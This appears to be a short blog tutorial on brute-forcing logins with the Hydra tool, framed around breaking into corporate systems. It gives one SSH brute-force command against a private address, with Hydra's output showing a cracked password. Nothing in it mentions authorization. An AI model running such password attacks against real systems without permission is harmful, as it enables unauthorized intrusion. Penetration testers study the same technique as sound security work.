Brute force is main path to penetrate to systems. My experience shows that there is a lot of password vulnerability in coparate systems like SAN,server, network device etc. The tool I have been using is hydra because there is a lot of protocols to avaible to user. Today I am gonna show you how to use it in a simple way.
Brute Force with Hydra
Required parameters are usernames,passwords,protocol and hosts.
$ hydra -l ismail -P passlist.txt ssh://192.168.121.249
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2015-11-12 11:39:56
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 4 tasks per 1 server, overall 64 tasks, 4 login tries (l:1/p:4), ~ tries per task
[DATA] attacking service ssh on port 22
[ssh] host: 192.168.121.249 login: ismail password: 123456
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-11-12 11:39:58